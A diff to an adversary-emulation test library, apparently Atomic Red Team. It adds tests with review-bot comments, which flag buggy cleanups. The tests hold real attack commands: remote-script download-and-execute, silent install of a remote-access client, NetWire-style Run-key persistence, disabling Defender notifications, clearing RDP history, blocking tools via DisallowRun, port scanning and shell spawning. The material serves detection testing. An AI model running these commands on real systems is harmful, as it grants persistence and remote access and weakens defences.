+ -Destination "$env:temp\T1219Setup.exe" -dynamic
+
+ '
+ executor:
+ command: 'Start-Process #{NetSupport_Path} -ArgumentList "/S /v/qn"
+
+ '
+ cleanup_command: 'Stop-Process -Name "client32" -force -erroraction silentlycontinue
+
+ '
+ name: powershell
+ elevation_required: true
T1079:
technique:
x_mitre_platforms:
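Review bot: `get_prereq_command` downloads to the literal `"$env:temp\T1219Setup.exe"` while `prereq_command` tests `#{NetSupport_Path}`, so overriding the input argument makes the dependency unsatisfiable — use `-Destination "#{NetSupport_Path}"`. The silent install leaves the NetSupport client installed after the test, yet `cleanup_command` only stops the `client32` process; cleanup should run the product's silent uninstall (or, at minimum, the description must state that a third-party remote-access client remains installed and needs manual removal), otherwise every run leaves persistent remote access on the host. The download URL is an unpinned vendor CDN path (`nsm-1270`), so the installer the test fetches can change without this repository noticing; recording the expected version in the description would help reviewers. The T1219 test list this entry joins begins before the hunk.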
diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md
index 8df98cb9..496d9bab 100644
--- a/atomics/T1046/T1046.md
+++ b/atomics/T1046/T1046.md
@@ -41,15 +41,17 @@ Upon successful execution, sh will perform a network connection against a single
-
-#### Attack Commands: Run with `sh`!
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| host | Host to scan. | String | 192.168.1.1|
-```sh
-for port in {1..65535};
-do
- echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
-done
+#### Attack Commands: Run with `bash`!
+
+
+```bash
+for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
```
@@ -86,7 +88,7 @@ Upon successful execution, sh will utilize nmap, telnet, and nc to contact a sin
```sh
-nmap -sS #{network_range} -p #{port}
+sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
```
diff --git a/atomics/T1046/T1046.yaml b/atomics/T1046/T1046.yaml
index 4b8b5ac1..625031dc 100644
--- a/atomics/T1046/T1046.yaml
+++ b/atomics/T1046/T1046.yaml
@@ -10,13 +10,15 @@ atomic_tests:
supported_platforms:
- linux
- macos
+ input_arguments:
+ host:
+ description: Host to scan.
+ type: String
+ default: 192.168.1.1
executor:
command: |
- for port in {1..65535};
- do
- echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
- done
- name: sh
+ for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
+ name: bash
- name: Port Scan Nmap
auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f
description: |
@@ -61,7 +63,7 @@ atomic_tests:
(which yum && yum -y install epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)
executor:
command: |
- nmap -sS #{network_range} -p #{port}
+ sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
name: sh
diff --git a/atomics/T1059.004/T1059.004.md b/atomics/T1059.004/T1059.004.md
index 4f66055c..83921a97 100644
--- a/atomics/T1059.004/T1059.004.md
+++ b/atomics/T1059.004/T1059.004.md
@@ -121,6 +121,10 @@ chmod +x #{autosuid}
bash #{autosuid}
```
+#### Cleanup Commands:
+```sh
+rm -rf #{autosuid}
+```
@@ -132,7 +136,7 @@ if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```bash
-curl #{autosuid_url} --output #{autosuid}
+curl --create-dirs #{autosuid_url} --output #{autosuid}
```
@@ -168,6 +172,10 @@ chmod +x #{linenum}
bash #{linenum}
```
+#### Cleanup Commands:
+```sh
+rm -rf #{linenum}
+```
@@ -179,7 +187,7 @@ if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```bash
-curl #{linenum_url} --output #{linenum}
+curl --create-dirs #{linenum_url} --output #{linenum}
```
diff --git a/atomics/T1059.004/T1059.004.yaml b/atomics/T1059.004/T1059.004.yaml
index cccb737d..ef45dfb7 100644
--- a/atomics/T1059.004/T1059.004.yaml
+++ b/atomics/T1059.004/T1059.004.yaml
@@ -60,13 +60,14 @@ atomic_tests:
prereq_command: |
if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
get_prereq_command: |
- curl #{autosuid_url} --output #{autosuid}
+ curl --create-dirs #{autosuid_url} --output #{autosuid}
executor:
command: |
chmod +x #{autosuid}
bash #{autosuid}
+ cleanup_command: |
+ rm -rf #{autosuid}
name: sh
-
- name: LinEnum tool execution
auto_generated_guid: a2b35a63-9df1-4806-9a4d-5fe0500845f2
description: |
@@ -89,9 +90,11 @@ atomic_tests:
prereq_command: |
if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
get_prereq_command: |
- curl #{linenum_url} --output #{linenum}
+ curl --create-dirs #{linenum_url} --output #{linenum}
executor:
command: |
chmod +x #{linenum}
bash #{linenum}
- name: sh
\ No newline at end of file
+ cleanup_command: |
+ rm -rf #{linenum}
+ name: sh
diff --git a/atomics/T1059.006/T1059.006.md b/atomics/T1059.006/T1059.006.md
index 0dd01c8c..731d8401 100644
--- a/atomics/T1059.006/T1059.006.md
+++ b/atomics/T1059.006/T1059.006.md
@@ -220,9 +220,10 @@ ID T1059.006. Adversaries may abuse Python commands and scripts for execution. P
```bash
-python -c "import pty;pty.spawn('/bin/sh')"
+which_python=$(which python || which python3 || which python2)
+$which_python -c "import pty;pty.spawn('/bin/sh')"
exit
-python -c "import pty;pty.spawn('/bin/bash')"
+$which_python -c "import pty;pty.spawn('/bin/bash')"
exit
```
diff --git a/atomics/T1059.006/T1059.006.yaml b/atomics/T1059.006/T1059.006.yaml
index 94a5eae7..a5502e79 100644
--- a/atomics/T1059.006/T1059.006.yaml
+++ b/atomics/T1059.006/T1059.006.yaml
@@ -164,8 +164,9 @@ atomic_tests:
pip install requests
executor:
command: |-
- python -c "import pty;pty.spawn('/bin/sh')"
+ which_python=$(which python || which python3 || which python2)
+ $which_python -c "import pty;pty.spawn('/bin/sh')"
exit
- python -c "import pty;pty.spawn('/bin/bash')"
+ $which_python -c "import pty;pty.spawn('/bin/bash')"
exit
name: bash
diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md
index fc0389c8..459e96cb 100644
--- a/atomics/T1082/T1082.md
+++ b/atomics/T1082/T1082.md
@@ -52,6 +52,8 @@ Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure a
- [Atomic Test #22 - WinPwn - PowerSharpPack - Seatbelt](#atomic-test-22---winpwn---powersharppack---seatbelt)
+- [Atomic Test #23 - Azure Security Scan with SkyArk](#atomic-test-23---azure-security-scan-with-skyark)
+
@@ -729,4 +731,81 @@ Invoke-Seatbelt -Command "-group=all"; pause
+
+
+
+## Atomic Test #23 - Azure Security Scan with SkyArk
+Upon successful execution, this test will utilize a valid read-only Azure AD user's credentials to conduct a security scan and determine what users exist in a given tenant, as well as identify any admin users.
+Once the test is complete, a folder will be output to the temp directory that contains 3 csv files which provide info on the discovered users.
+See https://github.com/cyberark/SkyArk
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** 26a18d3d-f8bc-486b-9a33-d6df5d78a594
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure AD username | String | |
+| password | Azure AD password | String | T1082Az|
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+Import-Module $env:temp\AzureStealth.ps1 -force
+$Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
+Connect-AzAccount -Credential $Credential
+Connect-AzureAD -Credential $Credential
+Scan-AzureAdmins -UseCurrentCred
+```
+
+#### Cleanup Commands:
+```powershell
+$resultstime = Get-Date -Format "yyyyMMdd"
+$resultsfolder = ("Results-" + $resultstime)
+remove-item $env:temp\$resultsfolder -recurse -force -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The SkyArk AzureStealth module must exist in $env:temp.
+##### Check Prereq Commands:
+```powershell
+if (test-path $env:temp\AzureStealth.ps1){exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+invoke-webrequest "https://raw.githubusercontent.com/cyberark/SkyArk/3293ee145e95061a8980dd7b5da0030edc4da5c0/AzureStealth/AzureStealth.ps1" -outfile "$env:temp\AzureStealth.ps1"
+```
+##### Description: The AzureAD module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AzureAD -Force
+```
+##### Description: The Az module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name Az -Force
+```
+
+
+
+
diff --git a/atomics/T1082/T1082.yaml b/atomics/T1082/T1082.yaml
index c315e097..65cb098b 100644
--- a/atomics/T1082/T1082.yaml
+++ b/atomics/T1082/T1082.yaml
@@ -274,3 +274,54 @@ atomic_tests:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
Invoke-Seatbelt -Command "-group=all"; pause
name: powershell
+- name: Azure Security Scan with SkyArk
+ auto_generated_guid: 26a18d3d-f8bc-486b-9a33-d6df5d78a594
+ description: |
+ Upon successful execution, this test will utilize a valid read-only Azure AD user's credentials to conduct a security scan and determine what users exist in a given tenant, as well as identify any admin users.
+ Once the test is complete, a folder will be output to the temp directory that contains 3 csv files which provide info on the discovered users.
+ See https://github.com/cyberark/SkyArk
+ supported_platforms:
+ - azure-ad
+ input_arguments:
+ username:
+ description: Azure AD username
+ type: String
+ default: null
+ password:
+ description: Azure AD password
+ type: String
+ default: T1082Az
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ The SkyArk AzureStealth module must exist in $env:temp.
+ prereq_command: |
+ if (test-path $env:temp\AzureStealth.ps1){exit 0} else {exit 1}
+ get_prereq_command: |
+ invoke-webrequest "https://raw.githubusercontent.com/cyberark/SkyArk/3293ee145e95061a8980dd7b5da0030edc4da5c0/AzureStealth/AzureStealth.ps1" -outfile "$env:temp\AzureStealth.ps1"
+ - description: |
+ The AzureAD module must be installed.
+ prereq_command: |
+ try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+ get_prereq_command: |
+ Install-Module -Name AzureAD -Force
+ - description: |
+ The Az module must be installed.
+ prereq_command: |
+ try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+ get_prereq_command: |
+ Install-Module -Name Az -Force
+ executor:
+ command: |
+ Import-Module $env:temp\AzureStealth.ps1 -force
+ $Password = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+ $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Password
+ Connect-AzAccount -Credential $Credential
+ Connect-AzureAD -Credential $Credential
+ Scan-AzureAdmins -UseCurrentCred
+ cleanup_command: |
+ $resultstime = Get-Date -Format "yyyyMMdd"
+ $resultsfolder = ("Results-" + $resultstime)
+ remove-item $env:temp\$resultsfolder -recurse -force -erroraction silentlycontinue
+ name: powershell
+ elevation_required: true
diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md
index 9e00c1d0..dd4a4e1a 100644
--- a/atomics/T1087.002/T1087.002.md
+++ b/atomics/T1087.002/T1087.002.md
@@ -114,7 +114,7 @@ Enumerate logged on users. Upon exeuction, logged on users will be displayed.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| computer_name | Name of remote system to query | String | $env:COMPUTERNAME|
+| computer_name | Name of remote system to query | String | %COMPUTERNAME%|
#### Attack Commands: Run with `command_prompt`!
diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml
index 13c0e718..82169e55 100644
--- a/atomics/T1087.002/T1087.002.yaml
+++ b/atomics/T1087.002/T1087.002.yaml
@@ -35,7 +35,7 @@ atomic_tests:
computer_name:
description: Name of remote system to query
type: String
- default: $env:COMPUTERNAME
+ default: "%COMPUTERNAME%"
executor:
command: |
query user /SERVER:#{computer_name}
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index 6b0a8033..ddf99829 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -86,6 +86,16 @@ The Registry of a remote system may be modified to aid in execution of files as
- [Atomic Test #38 - Allow RDP Remote Assistance Feature](#atomic-test-38---allow-rdp-remote-assistance-feature)
+- [Atomic Test #39 - NetWire RAT Registry Key Creation](#atomic-test-39---netwire-rat-registry-key-creation)
+
+- [Atomic Test #40 - Ursnif Malware Registry Key Creation](#atomic-test-40---ursnif-malware-registry-key-creation)
+
+- [Atomic Test #41 - Terminal Server Client Connection History Cleared](#atomic-test-41---terminal-server-client-connection-history-cleared)
+
+- [Atomic Test #42 - Disable Windows Error Reporting Settings](#atomic-test-42---disable-windows-error-reporting-settings)
+
+- [Atomic Test #43 - DisallowRun Execution Of Certain Application](#atomic-test-43---disallowrun-execution-of-certain-application)
+
@@ -1414,4 +1424,192 @@ reg delete HKLM\System\CurrentControlSet\Control\Terminal Server /v fAllowToGetH
+
+
+
+## Atomic Test #39 - NetWire RAT Registry Key Creation
+NetWire continues to create its home key (HKCU\SOFTWARE\NetWire) as well as adding it into the auto-run group in the victim’s registry.
+See how NetWire malware - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 65704cd4-6e36-4b90-b6c1-dc29a82c8e56
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /t REG_SZ /d "C:\Users\admin\AppData\Roaming\Install\Host.exe" /f
+reg add HKCU\SOFTWARE\NetWire /v HostId /t REG_SZ /d HostId-kai6Ci /f
+reg add HKCU\SOFTWARE\NetWire /v "Install Date" /t REG_SZ /d "2021-08-30 07:17:27" /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /f >nul 2>&1
+reg delete HKCU\SOFTWARE\NetWire /va /f >nul 2>&1
+reg delete HKCU\SOFTWARE\NetWire /f >nul 2>&1
+```
+
+
+
+
+
+
+
+
+## Atomic Test #40 - Ursnif Malware Registry Key Creation
+Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\
+More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c375558d-7c25-45e9-bd64-7b23a97c1db0
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+reg add HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /v comsxRes /t REG_BINARY /d 72656463616e617279 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /va /f >nul 2>&1
+reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /f >nul 2>&1
+```
+
+
+
+
+
+
+
+
+## Atomic Test #41 - Terminal Server Client Connection History Cleared
+The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username that is used to login after each successful connection to the remote computer
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3448824b-3c35-4a9e-a8f5-f887f68bea21
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
+reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Must have the "MR9" Remote Desktop Connection history Key
+##### Check Prereq Commands:
+```powershell
+if ((Get-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default\").MR9) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -path "HKCU:\SOFTWARE\Microsoft\" -name "Terminal Server Client" -ErrorAction Ignore
+New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Default" -ErrorAction Ignore
+New-Itemproperty -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default" -name "MR9" -value "127.0.0.1" -PropertyType "String" -ErrorAction Ignore
+New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Servers" -ErrorAction Ignore
+New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Servers" -name "Redcanary" -ErrorAction Ignore
+```
+
+
+
+
+
+
+
+## Atomic Test #42 - Disable Windows Error Reporting Settings
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable windows error reporting settings. This Windows feature allow the use to report bug, errors, failure or problems
+encounter in specific application or process.
+See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d2c9e41e-cd86-473d-980d-b6403562e3e1
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+reg add HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
+reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
+```
+
+
+
+
+
+
+
+
+## Atomic Test #43 - DisallowRun Execution Of Certain Application
+Modify the registry of the currently logged in user using reg.exe via cmd console to prevent user running specific computer programs that could aid them in manually removing malware or detecting it
+using security product.
+See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 71db768a-5a9c-4047-b5e7-59e01f188e84
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /t REG_DWORD /d 1 /f
+reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /f >nul 2>&1
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v 1 /f >nul 2>&1
+```
+
+
+
+
+
diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml
index 203dc8e7..c79367f9 100644
--- a/atomics/T1112/T1112.yaml
+++ b/atomics/T1112/T1112.yaml
@@ -604,3 +604,94 @@ atomic_tests:
reg delete HKLM\System\CurrentControlSet\Control\Terminal Server /v fAllowToGetHelp /f >nul 2>&1
name: command_prompt
elevation_required: true
+- name: NetWire RAT Registry Key Creation
+ auto_generated_guid: 65704cd4-6e36-4b90-b6c1-dc29a82c8e56
+ description: |
+ NetWire continues to create its home key (HKCU\SOFTWARE\NetWire) as well as adding it into the auto-run group in the victim’s registry.
+ See how NetWire malware - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /t REG_SZ /d "C:\Users\admin\AppData\Roaming\Install\Host.exe" /f
+ reg add HKCU\SOFTWARE\NetWire /v HostId /t REG_SZ /d HostId-kai6Ci /f
+ reg add HKCU\SOFTWARE\NetWire /v "Install Date" /t REG_SZ /d "2021-08-30 07:17:27" /f
+ cleanup_command: |
+ reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /f >nul 2>&1
+ reg delete HKCU\SOFTWARE\NetWire /va /f >nul 2>&1
+ reg delete HKCU\SOFTWARE\NetWire /f >nul 2>&1
+ name: command_prompt
+ elevation_required: true
+- name: Ursnif Malware Registry Key Creation
+ auto_generated_guid: c375558d-7c25-45e9-bd64-7b23a97c1db0
+ description: |
+ Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\
+ More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg add HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /v comsxRes /t REG_BINARY /d 72656463616e617279 /f
+ cleanup_command: |
+ reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /va /f >nul 2>&1
+ reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /f >nul 2>&1
+ name: command_prompt
+ elevation_required: true
+- name: Terminal Server Client Connection History Cleared
+ auto_generated_guid: 3448824b-3c35-4a9e-a8f5-f887f68bea21
+ description: |
+ The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username that is used to login after each successful connection to the remote computer
+ supported_platforms:
+ - windows
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ Must have the "MR9" Remote Desktop Connection history Key
+ prereq_command: |
+ if ((Get-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default\").MR9) {exit 0} else {exit 1}
+ get_prereq_command: |
+ New-Item -path "HKCU:\SOFTWARE\Microsoft\" -name "Terminal Server Client" -ErrorAction Ignore
+ New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Default" -ErrorAction Ignore
+ New-Itemproperty -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default" -name "MR9" -value "127.0.0.1" -PropertyType "String" -ErrorAction Ignore
+ New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Servers" -ErrorAction Ignore
+ New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Servers" -name "Redcanary" -ErrorAction Ignore
+ executor:
+ command: |
+ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
+ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
+ name: command_prompt
+ elevation_required: true
+- name: Disable Windows Error Reporting Settings
+ auto_generated_guid: d2c9e41e-cd86-473d-980d-b6403562e3e1
+ description: |
+ Modify the registry of the currently logged in user using reg.exe via cmd console to disable windows error reporting settings. This Windows feature allow the use to report bug, errors, failure or problems
+ encounter in specific application or process.
+ See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg add HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+ reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+ cleanup_command: |
+ reg delete HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
+ reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
+ name: command_prompt
+ elevation_required: true
+- name: DisallowRun Execution Of Certain Application
+ auto_generated_guid: 71db768a-5a9c-4047-b5e7-59e01f188e84
+ description: |
+ Modify the registry of the currently logged in user using reg.exe via cmd console to prevent user running specific computer programs that could aid them in manually removing malware or detecting it
+ using security product.
+ See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /t REG_DWORD /d 1 /f
+ reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+ cleanup_command: |
+ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /f >nul 2>&1
+ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v 1 /f >nul 2>&1
+ name: command_prompt
+ elevation_required: true
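Review bot: In the DisallowRun test the value the attack writes (`reg add ...\Policies\Explorer\DisallowRun /v DisableEnhancedNotifications ...`) is not the value the cleanup removes (`reg delete ...\Policies\Explorer\DisallowRun /v 1 /f`), so the added value and the `Explorer\DisallowRun` subkey survive cleanup; the value name looks carried over from the previous test, and since the cleanup already assumes the numbered-value form, the add should match it, e.g. `/v 1 /t REG_SZ /d "<program-name placeholder>"`, with a final `reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f >nul 2>&1` added to the cleanup. In the "Disable Windows Error Reporting Settings" test, `HKLM64` is not a hive name reg.exe accepts, so the first add fails and the matching delete's failure is hidden by `>nul 2>&1`; only the plain `HKLM` pair does anything. Both of those descriptions say the test modifies "the registry of the currently logged in user", but the keys written are under HKLM, and the key is `Windows Defender\Reporting`, not a Windows Error Reporting setting, so the descriptions should be corrected to what is actually touched. The same text is mirrored in the T1112.md hunk above.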
diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md
index 22282127..8102cb77 100644
--- a/atomics/T1135/T1135.md
+++ b/atomics/T1135/T1135.md
@@ -83,7 +83,7 @@ Network Share Discovery using smbstatus
```bash
-smbstatus --shares
+sudo smbstatus --shares
```
diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml
index 2303e376..d5304b29 100644
--- a/atomics/T1135/T1135.yaml
+++ b/atomics/T1135/T1135.yaml
@@ -43,7 +43,7 @@ atomic_tests:
sudo #{package_installer}
executor:
command: |
- smbstatus --shares
+ sudo smbstatus --shares
name: bash
elevation_required: true
- name: Network Share Discovery command prompt
@@ -131,4 +131,4 @@ atomic_tests:
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
shareenumeration -noninteractive -consoleoutput
- name: powershell
\ No newline at end of file
+ name: powershell
diff --git a/atomics/T1218.008/T1218.008.md b/atomics/T1218.008/T1218.008.md
index 758dbec3..912c68f7 100644
--- a/atomics/T1218.008/T1218.008.md
+++ b/atomics/T1218.008/T1218.008.md
@@ -9,6 +9,8 @@ Adversaries may abuse odbcconf.exe to bypass application control solutions that
- [Atomic Test #1 - Odbcconf.exe - Execute Arbitrary DLL](#atomic-test-1---odbcconfexe---execute-arbitrary-dll)
+- [Atomic Test #2 - Odbcconf.exe - Load Response File](#atomic-test-2---odbcconfexe---load-response-file)
+
@@ -55,4 +57,53 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
+
+
+
+## Atomic Test #2 - Odbcconf.exe - Load Response File
+Execute arbitrary response file that will spawn PowerShell.exe.
+Source files: https://github.com/woanware/application-restriction-bypasses
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 331ce274-f9c9-440b-9f8c-a1006e1fce0b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| rsp_file_name | Response file name to load | String | T1218.008.rsp|
+| rsp_file_path | Response file path | String | PathToAtomicsFolder\T1218.008\bin\|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+cd #{rsp_file_path}
+odbcconf.exe -f #{rsp_file_name}
+```
+
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: T1218.008.rsp must exist on disk at specified location (#{rsp_file_path}#{rsp_file_name})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{rsp_file_path}#{rsp_file_name}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/T1218.008.rsp" -OutFile "#{rsp_file_path}#{rsp_file_name}"
